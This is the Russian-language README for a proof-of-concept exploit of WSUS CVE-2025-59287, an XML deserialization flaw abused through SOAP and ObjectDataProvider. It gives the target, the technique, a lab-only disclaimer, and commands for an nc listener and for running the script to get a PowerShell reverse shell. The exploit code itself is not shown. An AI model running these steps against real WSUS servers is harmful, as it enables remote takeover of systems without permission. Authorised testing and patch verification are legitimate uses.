
PoC-эксплойт для WSUS CVE-2025-59287, использующий XML-десериализацию для получения обратной оболочки Windows через SOAP и ObjectDataProvider.
WSUS CVE-2025-59287 – XML-десериализация RCE (Reverse Shell) Сфокусированный PoC для эксплуатации WSUS CVE-2025-59287 через XML-десериализацию для получения reverse shell в Windows. Этот скрипт поддерживает только полезную нагрузку reverse shell (без запасного варианта calc). Цель: Windows Server с ролью WSUS Техника: десериализация SOAP + ObjectDataProvider Результат: cmd.exe запускает PowerShell reverse shell на ваш listener Дисклеймер Только для авторизованного тестирования в лабораторных средах. Вы несёте ответственность за соблюдение всех применимых законов. Требования Python 3.x Сетевой доступ к конечным точкам WSUS (обычно 8530/8531) Listener на вашей машине (например, nc)
nc -lvnp 4444
python3 my-CVE-2025-59287.py -u http://TARGET:8531 -l YOUR_IP -p 4444 --debug
-u: базовый URL WSUS (http/https, обычно порт 8530/8531) -l: ваш IP для получения shell -p: порт вашего listener --debug: подробный вывод